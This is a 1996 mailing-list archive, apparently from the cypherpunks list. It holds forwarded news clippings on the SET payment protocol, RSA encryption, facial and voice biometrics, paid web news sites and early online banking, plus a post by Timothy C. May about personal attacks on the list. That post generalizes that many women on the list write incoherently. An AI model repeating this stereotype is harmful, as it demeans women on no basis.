(SAIC), and companies associated with the data encryption leader RSA Data Security Inc. -- announced they would provide products and services implementing the protocol. Verifone Inc. hit the ground running June 18 with a comprehensive electronic commerce package that it said would be the "first implementation" of SET, supported by numerous strategic allies from the SET circle and beyond. Said Verifone's Internet commerce division chief Roger B. Bertman, "This will help the industry benefit more quickly from increased Internet transaction volumes and allow us all to begin learning by doing." Verifone had reportedly pressed to join the SET team, only to run up against the members' desire to stay small. But Verifone was very plugged in, and Mr. Bertman's "learning by doing" could have been their motto. By implication, publication of SET was just one more beginning. At the heart of SET is data encryption technology, specifically that provided and championed by RSA of Redwood City, Calif. In the encryption field, science meets commerce. The plodding of the scientific method tempers businesses' drive to get products to the market. Further complicating any venture into encryption -- the mathematical technique for scrambling messages to prevent unauthorized reading -- is the overhang of public policy. RSA and its progeny have chafed at federally imposed limits on cryptographic systems, particularly on the length of the code-defining keys they can export. While most financial activities are not hindered by the government's concern about "strong encryption," any banking or payment-related activity is surely to be scrutinized by that industry's regulatory establishment. It is only 20 years since the advent of public key cryptography. Improvements have been continuous, at least theoretically enabling the guardians of secure data to stay a step ahead of criminal pursuers. 
That SET could come together in a few months of concentrated effort is testimony to the strength and durability of the concept. As in academic tradition, what is tested and proven wins out. MasterCard's and Visa's pre-SET attempts, Secure Electronic Payment Protocol and Secure Transaction Technology, "didn't incorporate enough of preexisting security standards," said Allan M. Schiffman, chief technology officer of Terisa Systems Inc., a Los Altos, Calif., company formed in 1995 by RSA and several other investors to develop secure systems for Internet commerce. "In dealing with crypto, it's nice for stuff to be out and analysts to take a shot at it," said Mr. Schiffman, whose company was intimately involved in SET and said back in April that it would build the protocol into its client and server toolkits. "Older standards that aren't broken are what crypto-developers want." SET's reliance on the proven didn't stop the sniping. Lee H. Stein, chairman of First Virtual Holdings Inc. in San Diego, designed his Internet commerce system such that payment data flow via a private communications channel rather than the World Wide Web. First Virtual is not yet ready to bank on encryption. SET may be a step in the right direction, but it didn't sway Mr. Stein. "Sensitive financial information is never to be on the Internet," Mr. Stein said at the Cyberpayments '96 conference in Dallas in June. "Has anyone here yet seen a hierarchical, encryption-based certification authority working at the consumer level?" Jerome Svigals, a California-based consultant and long-time advocate of smart cards, criticized the lack of portability of the customer certificates required for an SET transaction. Designed to be embedded in a personal computer, the certificates, or digital signatures, might better comport with the credit card transaction model by being stored on smart cards. Aharon Friedman, chairman and chief product developer of Digital Secured Networks Technology Inc. 
in Englewood Cliffs, N.J., has expressed concern about the software-only nature of SET. He said it requires a hardware component to be fully secure. Mr. Friedman, a one-time SAIC research physicist who founded his network security company last year, also said too much of an SET message is in clear text or subjected to "hash functions" that do not provide the high security levels of encryption. "Unlike hardware, software can be bypassed using a computer," Mr. Friedman said. He has suggested that a hardware-based approach be incorporated into SET at "a more elementary level" so that all the text can be encrypted. "He put it aggressively," Mr. Schiffman said of Mr. Friedman. "What he says is not wrong, but it was not unaccounted for" in SET revisions. Other SET defenders have pointed out that the three aforementioned critics have vested interests in, respectively, off-Internet payments, smart cards, and hardware. Mr. Friedman said he is a few months away from a hardware-software solution that would be economical for PCs and even laptop computers, but he was not ready to talk about specific pricing. More fundamentally, the SET group had to grapple with classic questions of appropriateness. The security measures had to fit the potential crimes, at a reasonable cost. As new electronic payment media develop, "people are going to realize that they can't guarantee 100% security," Geoffrey Baehr, a top network technology official at Sun Microsystems Inc., said at a banking conference earlier this year. "Instead, they will aim their development work at 100% acceptance of risk, and assume there is always some amount of fraud. "It happens, and there isn't much you can do about it other than best efforts." Focusing on the framework for card payments, the SET group put its best efforts toward standards for transaction software and the ever-critical authentication of cardholders, merchants, and banks, based on the digital certificates issued and maintained by "trusted parties." 
A big selling point is that merchants don't see buyers' credit card numbers; the system transparently validates them. RSA Data Security has a central, commercial interest in how SET develops and has taken on an associated, almost public-service responsibility for coordination. "SET is definitely the way to go to secure bank card transactions," said Kurt Stammberger, RSA's director of technology marketing. "We believe it will be huge. Otherwise we wouldn't have built a toolkit around it." Indeed, the "RSA Encryption Engine" brand will be on Verifone's software products -- vGate, vPOS, and vWallet -- the first of what should be many SET-related licenses. Because there will be a proliferation of on-line products, especially the virtual wallets at the consumer level, Mr. Stammberger said "RSA's role will be to make sure all the wallet implementations talk to all the merchant implementations and the banks." "Building cryptography is not trivial, but getting all the right people talking to each other can be even more of a challenge," Mr. Stammberger said. Meanwhile, Verisign Inc., spun off by RSA 17 months ago, is going after the certification piece of the business. In July it announced it was chosen by Visa International to provide Internet authentication through the member banks. Building a global infrastructure for the encryption-based certification product it calls Digital ID, Verisign views the Visa deal as a big mass-market opening for digital signatures. "The financial services industry is leading the charge in bringing Internet commerce to the consumer," said Verisign president and chief executive officer Stratton Sclavos, who has also signed breakthrough licensing pacts with Microsoft and Netscape. He expects market availability of his "high-volume, scalable-to-the-millions" product "as soon as SET is ready," by early next year. 
MasterCard designated the CyberTrust unit of GTE Corp., one of its partners in the SET project, as its private-label certificate provider. The announcement, within days of Visa-Verisign in late July, prompted some one-upmanship. MasterCard senior vice president Steve Mott predicted GTE would be "bigger, better, and faster" in the market. Visa U.S.A. president Carl Pascarella wanted to underscore that the Verisign-GTE face off means healthy competition, not a return to the earlier SET dissension. He said the card associations rejected the idea of a single certification authority because it could have been monopolistic. And while Visa members can now choose Verisign, and MasterCard members GTE, they could also be their own "CA" or pick from other suppliers. "Visa and MasterCard agreed to pursue different certification options," he said. "The technology will be more robust, and it will minimize the impact on issuers and acquirers. "Things are changing so fast, we don't want to be in the position of driving stakes into the ground. Our concern right now is to protect the banks, and SET does that."

The Miami Herald: Monday, September 16, 1996
Firm Hopes Facial "Signature" to be Foolproof

Don't look for twenty-something computer nerds at Identification Technologies International in Coral Gables. ITI, a high-tech firm founded in 1993, is run by David Bendel Hertz, an energetic septuagenarian. Hertz has held executive engineering positions at RCA and Celanese, has been a partner at the consulting firm McKinsey & Co. in New York and has taught business and law at the University of Miami. His latest venture focuses on a facial recognition system, with applications from building access to internet banking. "We are a start-up business, a research and development company," says Hertz, 77. "And now we're becoming an operative company." Hertz saw an opportunity in 1994. Conventional facial recognition systems "were too slow and took too much computer memory," he says. 
And stored on a hard drive, the data were vulnerable to hackers. Hertz calls his solution One-to-One. It uses a camera to take a person's photo and compares it to a facial "pixel signature." The signature uses only 96 bytes of memory -- as opposed to 500 to 2,000 bytes in conventional systems -- and can be easily stored on a smart card. Hertz insists that even the most intelligent hacker won't be able to break into the system because the data is not available on a central computer system and a stolen smart card will not match the thief's facial characteristics. Hertz allows that ITI has spent more than $1 million so far, half from him and half from Peipers, a New York investment company. ITI offers its system in the form of a small black box, containing the camera and connected to a computer. One-to-One uses little memory because it focuses on specific characteristics, such as the position of the eyes and the form of the mouth, while older systems store a photo-like image of the face. "When we started," Hertz says from a University of Miami test lab, "the first thing we did was ask a plastic surgeon if there are sufficient differences between faces. "'Every face is different,' he answered. But what about identical twins, we wanted to know. "The surgeon said there are enough differences in their faces that some people -- like their mother -- always can recognize them." Using biometrics, the branch of biology that deals with data statistically and by mathematical analysis, One-to-One can recognize these differences as well as a mother. A niggling problem, however, is that the system may not recognize a characteristic that is not part of your signature, such as a new haircut or even a smile. So far, ITI has made 50 units, mostly for testing and evaluation. Priced at $2,000-$3,000, two of the units have been sold to Westinghouse Security Electronics, which does not manufacture facial recognition systems. 
Jorge Sousa, director of product development at Westinghouse's systems division, based in Santa Clara, Calif., says he is "convinced that biometrics has a future," and that his company is keenly interested in ITI's product. Citicorp is currently testing Hertz's system on its ATMs, and AktivNet, a Miami company, has agreed to try out 400 units in 1997 on its communications kiosks in airports and hotels geared to business travelers. Hertz has also presented One-to-One to the National Security Agency, which he says "exhibited high-level interest." ITI is being marketed in Europe, South Africa and the Middle East by a Dutch company, Digistration. Hertz sees customers ranging from airports to welfare agencies to sports arenas. "The market is large and growing every day," he says. David Leibowitz, managing director and analyst at Burnham Securities in New York, also sees a rising interest in sophisticated security systems. "There is every likelihood that more creative devices will be needed," said Leibowitz, who added that with the rise in crime and theft, "The security market is growing at a dramatic pace." Leibowitz points out that the security market can include everything from barbed-wire fences to combination locks to the high-tech devices manufactured by such companies as Sensormatic, Checkpoint and Knogo. "Should ITI's product prove itself in tests and go on to succeed in real-world applications," he said, "there is a good chance there would be a market for it." But he cautioned that between now and then, competitors may have developed similar or more innovative systems that affect ITI's potential to market its product. Hertz plans to hire 10 additional employees to market and distribute ITI products. They will join the 12 people currently on staff, an international group including a computer programmer, biomedical scientist and mathematical analyst. 
Their work has far-reaching implications: Hertz envisions a day when ITI develops systems and products that, for example, have the capability to "detect people in a crowd," to catch fugitives or help find missing persons.

Retail Banker International: August 22, 1996
Chase Builds "Best Biometric"

CHASE MANHATTAN is currently testing biometric voice printing for retail banking applications in two pilots in the New York area. The bank said these tests will be concluded before year-end, and could lead to the introduction of biometric voice printing in several retail channels as early as 1997. The two pilots now in progress are testing voice printing at branch offices, the most challenging environment for voice printing, due to ambient noise and distortion. Branch customers pick up a phone on the teller line and verify their identities instantly, saving the teller the time needed to check the validity of each customer's bank card. But the system's most dynamic application will be in remote delivery, and especially in phone banking, where customers' identities can be automatically verified as soon as they speak, allowing phone reps to call up all account data instantaneously. The bank expects to roll out voice printing first in high-risk wholesale operations, like funds transfer and treasury services, before introducing it to the retail side of the bank. "Voice is the best biometric," said Elizabeth Boyle, Chase VP for strategic implementation in New York. First, voice printing offers security in all channels, an advantage that techniques like fingerprinting and dynamic signature analysis do not enjoy. This means that customers can use the system for remote transactions and can open accounts without visiting a branch, for example. Second, customers are most comfortable with voice printing, which is considered far less intrusive than fingerprinting, for instance, and is completely invisible over the phone. 
Lastly, voice printing is the most effective security system, yielding the lowest percentage of false positives, and just as important, the lowest rate of false negatives. "We do not want to be in the position of telling customers that they are not who they are," Boyle explained. Chase's voice printing pilots use technology developed by Votan of Pleasantville, California, a firm currently under registration for an initial public offering valued at $30 million. Direct mutual funds provider Fidelity Investments is also working on the implementation of voice printing technology, and Citibank is currently running voice pilots by four separate vendors. Boyle said that twelve months ago, Chase decided against multiple-vendor pilots, believing the technology was changing too rapidly to make this approach economical.

New York Times: Monday, September 16, 1996
Testing Whether Internet Readers Will Pay
By MIKE ALLEN

After extending its grace periods four times, The Wall Street Journal Interactive Edition says it will bar freeloaders from its World Wide Web site beginning Saturday. The results are being watched as a bellwether for prospects of charging for access to Web sites. Because of The Journal's fame and its high proportion of business users, founders of other sites figure that if The Journal does not succeed, they may have no chance of charging in the foreseeable future. Today's Web is a money pit, with sites getting some revenue from advertisers but virtually none from users. Nick Donatiello, a market researcher who surveys consumer attitudes about new technologies, said subscription fees might work in a special case like The Journal, but would remain rare. ``Consumers can surf the whole Web for less than $20 a month, so it's hard to convince them that they should pay for one little slice out of this enormous pie,'' said Donatiello, the president of Odyssey LP, a research firm in San Francisco.
``Paying for content is going to be dwarfed by having advertisers pay, not because the Web has a culture of free content, but because television has a culture of advertising-supported content.'' A message on the Journal's site (http://www.wsj.com) says, ``Avoid the rush and convert now to a paid subscription.'' The interactive Journal is charging $49 a year, or $29 to those who take the print Journal, which runs $164 a year. Neil F. Budde, the editor of the interactive edition, said many people were philosophically opposed to paying for information on the Web. But he said others would subscribe because of the site's features like Briefing Book, which offers news about a company, charts of stock performance and five years of financial data. ``These are not the people who have been on the Internet since Day One,'' he said. ``These are newer people, people who are in business, who say it's worth it not to have to look four different places on the Internet'' to find information that the Journal site pulls together. About 650,000 people registered during the interactive Journal's trial period. Thomas Baker, the business director of the interactive edition, said surveys of those users indicated 10 to 30 percent were willing to pay. ``If, at the end of the year, we had 20,000 to 25,000, that would be good,'' Baker said. ``We're realists. Our expectations are fairly modest. We look at this as a magazine start-up, and even successful magazines take a while to ramp up.'' Baker said only 20 to 25 percent of those surveyed subscribed to the print Journal. ``That helped allay people's fear of the cannibalization of the print readership,'' he said. When the site opened in April, it offered free access through July 31. That was extended to Aug. 31, then Sept. 21. The deadline to register was May 31, then June 30, then Aug. 1. There is still a loophole: Access to the on-line Journal is free through Dec. 31 to those who download the Microsoft Corp.'s Web browser, Internet Explorer. 
Also free: two-week trials of the Journal site. Barron's, a weekly that like the Journal is published by Dow Jones & Co., thought big when it announced its Web site in May, saying it planned to charge $99 a year for basic access, and even more for premium areas like an Investors Workstation. That would have made it the most expensive mass-market site on the Web. The plan has been rethought. Barron's Online (http://www.barrons.com) has remained free, and a spokesman said the future subscription price had not been determined. The Web site of The New York Times requires users to register but does not charge. About 600,000 have signed up since the site (http://www.nytimes.com) opened in January. ``Our view is that market share is a more important criterion for success than whether you can get a few people to pay for the service,'' said Martin A. Nisenholtz, the president of The New York Times Electronic Media Co. ``But we continue to evaluate our users' willingness to pay for information on line.'' The other best-known news sites, including those from CNN, USA Today, The Washington Post and The Los Angeles Times, are open to all. ESPN's site (http://espnet.sportszone.com) charges $39.95 a year for access to premium areas, including columnists. But that service, too, is free until the end of the year through Microsoft Explorer. Microsoft, meanwhile, has found an old-fashioned way to get some income from its on-line magazine, Slate: sell paper copies. Slate on Paper went on sale this month in many Starbucks coffee boutiques, and mail subscriptions are available. The 62-page digest of the on-line version is produced in Microsoft's print shop. The paper Slate is $29.95 a year. That's $10 more than the on-line version will be when it starts charging for access on Nov. 1. The site (http://www.slate.com) was started in June with great fanfare from traditional media, but it continues to be skewered in the on-line world. 
The September issue of Wired magazine inaugurated the Kinsley Deathwatch, a pool to predict when Michael Kinsley, Slate's editor, will return from Redmond, Wash., to the other Washington. Slate on Paper, which includes about one-third of the Web version, includes an editors' note heralding ``the transmutation of all-digital Slate to the fusty comfort of analog paper and ink.'' ``To the best of our knowledge, Slate on Paper is the first Webzine to reverse the process,'' the note says. ``Some say it is fitting for two companies so closely associated with the image of Seattle - Microsoft and Starbucks - to be joining forces. Others say it is beyond parody.'' A parody site, Stale (http://www.stale.com), pretends to offer a printed version, ``thereby defeating the purpose of being on the Web.'' Rogers Weed, Slate's publisher, said the print edition was ``a bridge to the people that aren't on the Internet today.'' But how many Starbucks customers want Chechnya with their frappuccino? Even some of the chain's employees are puzzled. ``This is Starbucks coffee,'' said Carol Hensler, who worked at a store in Richmond, Va. ``We only have coffee and coffee products.''

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From tcmay at got.net Wed Sep 18 01:09:41 1996
From: tcmay at got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 16:09:41 +0800
Subject: A Bizarre Increase in the Ad Hominems Here
Message-ID:

Must be the Ides of September, but there are several bizarre new attacks lately on this list, none of them to the point, just odd ad hominems:

* Detweiler (vznuri at netcom.com) writes: "timmy waxes a widdle on AP"

* Millie (pstira at escape.com) writes: "Timmy boy, I yelled at someone for this last week. And you supported my view. Never read Ayn Rand, eh?"

(Sadly, a large fraction of the women who have posted on our list have written in this same kind of incoherent, rambling, makes-no-sense kind of style.
I have no idea why the percentage of such events is so high.)

* And of course Vulis has been posting his "farting" messages far and wide.

Those who legitimately disagree with my arguments should of course continue to speak up. But those who confuse calling me "Timmy" with making substantive arguments need to go back to school.

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From dlv at bwalk.dm.com Wed Sep 18 01:18:36 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 16:18:36 +0800
Subject: [NEWS] Crypto-relavant wire clippings
Message-ID:

Financial Times: Thursday, September 5, 1996
Banking on the Internet: Any Time, Anywhere
By George Cole

When Claus Nehmzow wants to check his bank statements or pay a bill, he simply switches on a personal computer. He can also transfer money between accounts and make electronic payments from almost anywhere in the world because his bank is on the Internet, the worldwide network of computers. Nehmzow, a principal with the management and technology consultancy firm Booz-Allen & Hamilton, says: "I live in England but my account is in the US. If I can find a computer that's linked to the Internet, I can access my account any time and anywhere." About 50m people have access to the Internet but this number is expected to reach 200m within two years.
This huge audience, the ability to offer a 24-hour service across borders and the potentially enormous savings in operational costs, have prompted many banks and financial institutions to consider hooking up to the Internet. But while the Internet offers many advantages, one issue makes many banks nervous -- security. The potential of millions of people gaining unauthorised access to sensitive financial information on the Internet, and then using it to commit fraud is so great that few banks are prepared to offer online services. A survey by Booz-Allen found that more than 600 banks had sites on the Internet's World Wide Web. However, almost three-quarters of the banks simply used their sites as "electronic brochures" to promote their services. Only 2 per cent of European banks and 1 per cent of US banks offered full banking services on the Internet. "Security is holding back many banks, but the sheer economics of the Internet will see many of them offering services on it," says Michael McConnell, vice-president of Booz-Allen. "The cost of an Internet banking transaction can be measured in cents, while the same transaction at a bank branch costs dollars. You can't ignore these kind of savings." Piero Verdiani, vice-president of Olivetti Systems and Services' professional services division, says the Internet offers an average saving of $1.20 per transaction when compared with using a traditional bank branch. "For a customer who makes five transactions a week this works out at $300 a year. A bank with 100,000 customers could potentially save $30m a year," he says. Nehmzow believes that many of the concerns about security are more an issue of perception than of real obstacles: "People hear about hacking and get worried. Yet many people will happily give their credit card numbers over the phone, knowing that if anything should go wrong, their credit-card company will accept most of the liability. The same could happen with electronic banking." 
Some banks have opted for privately-owned online services rather than the Internet. The UK-based TSB bank, for example, offers its customers an electronic-banking facility called PC Banking, through the CompuServe online service. "It's a step-up from the Internet in terms of security, but in the long term, the Internet will be an important agent for financial services," says Bill Goodland, product manager for CompuServe's financial services division. Barclays is piloting a similar PC-based banking service for personal customers. The system, launched in February and developed with Visa Interactive, runs from Barclays software on a Windows-compatible PC and modem from customers' homes or offices. The attraction of the Internet is that users do not need to access proprietary PC banking software or special online services to carry out banking transactions. Nehmzow's electronic bank is the Security First Network Bank, based in Atlanta, Georgia. SFNB, which claims to be the first Internet bank, opened for service in October 1995. It has more than 2,000 customers, mostly professionals aged between 26 and 55. The SFNB uses a number of security features, which include issuing each customer with a personal identification number (Pin) and encrypting or scrambling any data that is sent over the Internet. The bank's internal computer network is protected by a "firewall" which filters all electronic traffic. This month, the US bank First City Bank and Trust plans to launch an Internet banking service using similar security facilities. In the UK, Midland Bank is working with Microsoft in order to offer Internet banking. Olivetti, and Sparekassernes Data Center, a consortium of 80 Danish savings banks, have formed a joint venture called FIT (Financial Internet Technology). FIT has developed E-Bank (Electronic Bank), a system which uses the Internet for banking from home, and offers various levels of security, including passwords, PIN codes and encryption. 
Some believe that Internet banking will take off when there is widespread use of a technology known as public-key cryptology. A key is a complex mathematical number that may be many hundreds of digits in length, creating hundreds of billions of potential combinations. The key is divided into a public key and a private key. The public key is available to anyone, and may be printed in a directory or even posted on to the Internet. The private key is kept secret by the owner. A message is sent to the owner by encrypting it with his or her public key. Only the correct private key can decrypt it. The public-key system also makes it possible to produce a "digital" signature. "This is important, because a bank will need to be confident that it is communicating with the genuine customer, and the customer needs to be certain that he's dealing with his bank," says McConnell. "It also provides proof that the customer authorised a particular transaction." A digital signature is created by the sender, who encrypts part of the message with his or her private key. The recipient of the message uses the sender's public key to decrypt the segment and thus confirm the identity of the sender. The system will automatically operate whenever a message is being sent or received over the Internet. Public-key systems will also be used for credit-card transactions. Visa International and Mastercard International have joined forces with a number of companies including GTE, IBM, Microsoft and Netscape to develop SET (Secure Electronic Transactions) which will allow users to make secure credit-card payments over the Internet: "It will mean that someone making a $10 transaction won't get billed for $10m," says Bernard Ovink, senior manager of Visa's electronic commerce division. SET is due to come into operation in late 1997. There are many encryption systems available, including several developed by RSA Data Security, based in Redwood California.
RSA is providing the encryption technology for SET. The power of a key is measured in bits - an eight-bit key offers 256 possible combinations, while a 40-bit key has more than 1,000bn combinations. Some 40-bit keys have been cracked by cryptology enthusiasts, causing some to question the security of public-key systems. But McConnell says this fear is misplaced: "It took months to crack each key and a tremendous amount of computing power. But the question is: was it worth all the effort? It's like spending $100 to counterfeit a $20 bill." McConnell foresees a time when many people will have their own public and private keys: "I think you'll get an agency such as the Post Office distributing the keys to the public, and then financial organisations will use them to create online banking and other services. This is going to happen sooner than some people think."

American Banker: Thursday, September 5, 1996
OCC Allows Internet Access Plan, Eyeing Competitive Edge for Banks
By OLAF de SENERPONT DOMIS

A small bank in Pennsylvania has won the first regulatory approval to sell Internet access to the public, which could attract customers to on-line banking and other electronic services. The decision, released Tuesday by the Office of the Comptroller of the Currency, could help national banks compete with nonbank providers of on-line financial services, experts said. "The OCC is aggressively pushing the envelope with this decision, because it's allowing a service not directly related to banking," said Charles M. Horn, a partner at Mayer, Brown & Platt, a Washington law firm. "It is part of a natural progression toward letting banks expand the way they provide financial services." "The comptroller has recognized the critical importance of technology to the future of the banking industry," agreed Robert G. Ballen, a partner at the Washington law firm Schwartz & Ballen.
"This is consistent with the comptroller's concern that banks be able to effectively compete with nonbanks." In an Aug. 19 letter to Apollo Trust Co. in Apollo, Pa., the OCC told the $105 million-asset bank it could sell general Internet access to anyone in its western Pennsylvania service area. The bank also was given permission to give free Internet access to schools, government offices, libraries, churches, and various nonprofit organizations. "We have a long-standing precedent of allowing banks to use the excess capacity of their physical facilities, and this ruling translates those old precedents into the technology world," Comptroller Eugene A. Ludwig said in an interview Wednesday. "Making sure that banks use things as efficiently as possible is a win-win for everybody - the bank, its customers, and the community. "This is very symbolic of how the use of the electronic media can help banks of all sizes provide products and services to customers." Viveca Ware, director of payment systems at the Independent Bankers Association of America, said, "Not only does this open the door for banks to compete with nonbank Internet service providers, it opens up a whole new realm for banks to offer new services to their communities." Separately, the OCC approved a request by Huntington National Bank in Columbus, Ohio, to enter into a joint smart card venture with the Student Loan Marketing Association and Battelle Memorial Institute, a Columbus, Ohio-based technology research organization. Huntington has said the venture, to be based in Columbus and named Cybermark, will develop, market, and maintain stored-value card systems for self-contained communities such as universities, hospitals, theme parks, and military installations. Apollo already allows its customers to transfer funds, apply for loans, and view account balances via the Internet. 
Apollo purchased powerful computer equipment to provide these services and has the excess capacity to provide a gateway to the Internet. Ray Muth, the bank's executive vice president, said Apollo plans to entice new customers to its computer banking products by offering Internet access. "This is an absolutely golden opportunity for us," Mr. Muth said in an interview. "We'll increase our profitability by developing new customer relationships." The OCC concluded that offering Internet access to the public is part of the business of banking because it satisfies three criteria. First, it allows banks to provide more convenient service to customers. Second, the OCC argued that full Internet access is needed to let banks market their electronic banking services. Third, the OCC said that because the computer hardware Apollo purchased had extra capacity, the bank ought to be able to use it profitably. In the interview, however, Mr. Ludwig said banks cannot purchase computer equipment solely to offer customers Internet access. News Release(Online Resources): Wednesday, September 4, 1996 Online Resources to Provide Transaction Link to AOL Online Resources & Communication Corporation, one of the leading providers of interactive financial services, announced today that it has entered into an agreement with America Online Inc., the world's largest consumer online service, to provide financial transaction capabilities to America Online's more than six million members. This agreement coincides with the launch of the AOL Banking Center, a focal point that gives AOL members access to financial institutions who participate in the AOL Banking Center. AOL members may visit their financial institution's virtual branch that resides within the AOL Banking Center. Online Resources will have a direct link to AOL, enabling clients who participate in the AOL Banking Center to offer real-time banking, bill payment and other transaction services to AOL members. 
"The power of transaction processing cannot be understated," said Online Resources CEO Matthew P. Lawlor. "The AOL members will return to their virtual branch again and again if it is their site for moving money, paying bills and getting current personal financial information. The cross selling opportunities for participating financial institution are enormous." Ted Leonis, president of the AOL Service Company, said, "Online Resources is one of the leading interactive financial services providers in the industry. Its focus on financial institutions and their transaction capabilities nicely complement our focus on consumers and their desire for value-added services." Online Resources provides consumer access to its financial institution customers through the PC via its PC Windows-based software or the World Wide Web, and through its ScreenPhone and touch tone telephones. AOL members requesting transactions or personal financial information from their virtual branch will seamlessly link-up to their financial institution through Online's Web site and return to the virtual branch in the AOL Banking Center when they have finished. America Online Inc., (NASDAQ Symbol: AMER), based in Dulles, Virginia, is the largest consumer online service in the world, with more than 6.2 million members worldwide. Through its services, AOL offers its subscribers a wide variety of services including electronic mail, conferencing, software, computing support, interactive magazines and newspapers, and online classes, as well as easy and affordable access to services on the Internet. Founded in 1985, AOL today has a global work force consisting of more than 5,000 people. Personal computer owners can obtain America Online software at major retailers and bookstores or by calling 800/827-6364. McLean, Va.-based Online Resources & Communications Corp. is a privately held company founded in 1989. 
It specializes in providing home banking, bill paying, investment and other financial services to financial institutions for resale under their own brand to consumers and small businesses. Online's clients include banks, brokerages, credit unions, ATM networks and other financial service providers. Currently, Online has 40 institutional clients. Online provides financial institutions with extensive support services, such as consumer marketing, call center bill paying software or service, security and communications network management. Users of Online's services may access their financial institution through a variety of devices, including the PC, conventional telephones or the company's low-cost ScreenPhone. Easy, low-cost access to a variety of interactive financial services is supported through either private commercial networks or through the Internet. Online's Web site is www.orcc.com. News Release (Sanwa Bank): Wednesday, September 4, 1996 Sanwa Among First In U.S. to Offer AOL Subscribers Intuit Software Sanwa Bank California today became one of the first banks in the United States to offer online banking and bill payment to the more than 6 million subscribers of America Online (AOL) through a new computer program developed by the nation's leading maker of personal financial software. Developed by Intuit Inc., which also makes Quicken(R), the nation's most popular personal finance software, the new service has been dubbed BankNOW(TM) and is available to current Sanwa Bank customers who are subscribers to America Online, as well as to new customers who sign-up with America Online and Sanwa Bank. In conjunction with the introduction of BankNOW, Sanwa Bank has established a site on America Online to give current and prospective customers product and service information, as well as a point-and-click option for opening a new account. The BankNOW software can be downloaded from Sanwa's site on AOL free of charge. 
Sanwa helped pioneer PC banking a year ago when it teamed with both Intuit and Microsoft Corp. to offer customers a PC home banking option. At the same time, it launched its site on the World Wide Web (http://www.sanwabank.com), one of the first to offer consumers the option of applying for loans, credit cards and other services through the Internet. "BankNOW is online banking software created expressly for convenience-oriented PC users who want a fast, simple and hassle-free way to conduct online banking and payment transactions," said Kathleen Graham, vice president for retail banking at Sanwa. "It is a natural outgrowth of our already state-of-the-art electronic banking capability." Sanwa customers who sign-up to use BankNOW will have the following options available:

-- Access to accounts day or night.
-- Reconcilement of accounts automatically.
-- Review of account balances.
-- Online transfers between linked accounts.
-- Write checks and pay bills to anyone or any creditor in the U.S.
-- Send e-mail to communicate with Sanwa.

As an additional inducement to sign-up, and in conjunction with its One Market Value account, Sanwa is offering a package of incentives, including fee-free ATM withdrawals at all STAR(R) and CIRRUS(R) locations, fee-free online banking and bill payment for 12 months, free checking for a year, no-annual-fee credit cards and no-annual-fee overdraft protection. On the business side, Sanwa's small business customers also will benefit if they sign-up for the BankNOW feature. Current and new customers, who have standard small business accounts, will receive 12 months of free online banking through BankNOW. Among other available options to small business customers are a direct e-mail link to the Sanwa branch manager assigned to their account and online banking at the special reduced rate of $7.95 for the first 12 months. This special reduced price includes eight online banking sessions and 20 bill payments per month.
"We believe this alliance will bring user-friendly electronic banking to millions of consumers -- both personal and small business -- who might not otherwise have ever considered it," said Doug Stewart, first executive vice president. "It is another step toward reinforcing our campaign to remain one of the leaders in electronic banking throughout the U.S." American Banker: Thursday, September 5, 1996 On-Line Banking: Comerica Worker Moonlights in Cyberspace By JENNIFER KINGSON BLOOM By day, Frank De Armas is a foot soldier in Comerica Inc.'s information systems department. By night, he sheds his pinstripes, grabs his mouse, and becomes host and editor-in-chief of The Internet Banker, an on-line magazine, bulletin board, and resource center for people interested in what banks are doing in cyberspace. "It's like a clearing house for information on banking," Mr. De Armas said. "It started out as a little, tiny, part-time thing, but it just keeps growing." So much so that Mr. De Armas, a senior applications engineer for Detroit-based Comerica, now spends four hours a night at his home computer maintaining the Internet Banker site. He said it takes an hour to check all his links to other bank-related sites and to make sure that all the banks clamoring to be connected are added to the growing list. The other three hours are spent compiling a daily on-line banking newsletter, assembling a quarterly journal, and responding to questions that readers tack onto the site's bulletin boards. "If I know the answer, I post it," he said. The site grew out of Mr. De Armas' development last year of Comerica's Web site. He wanted to keep track of what other financial institutions were doing on the Internet, adding bank- and financial-related sites as he came across them. Then other people discovered his site and started using it. What began as a research tool "has taken on a life of its own." Bankers use the bulletin boards for global shop talk. 
In a recent posting, a Missouri banking regulator wrote to ask about the delivery of electronic banking services to rural areas. An Israeli economics student asked if people think the Internet will make "normal banks as we know them today disappear." A New Zealand banker named Lew solicited tips on boosting staff morale during a merger. A banker from Connecticut named Tom responded that "communication" and dress-down days had helped morale during his bank's merger. Then Mr. De Armas weighed in. "Tom has a good point," he wrote. "Anything you can do to make the employees feel more at ease will help. Stress is a natural byproduct of mergers." Trading insights has been the hobby's greatest pleasure for Mr. De Armas, an affable 35-year-old who taught himself to program computers in the Basic language while on injury leave from the Army. Mr. De Armas now knows several programming languages, and is an on-line veteran. "I was probably one of the only ones who used to get on chat lines on Prodigy at 1,200 baud," he recalled. His Web site radiates enthusiasm for the medium. In a page of tips about how to design a good site, he offers suggestions on how to link an electronic-mail address to a Web page, deftly suggesting: "The HTML code for this is easy." (HTML, or hypertext markup language, is the design language for Web sites.) For the less computer literate, Mr. De Armas' site offers a readable electronic magazine -- which he writes and edits -- on Internet-related banking issues. A recent issue included a question-and-answer session with one of the designers of BankAmerica Corp.'s Web site and a review of the site -- both presented in Mr. De Armas' effusive style. "You can't help but be impressed with BofA's site," he wrote in his review. "I tested the response time of the site at 9,600, 14,400, 28,800, and of course our leased line. ... My congratulations to the staff of BofA for a fine site." 
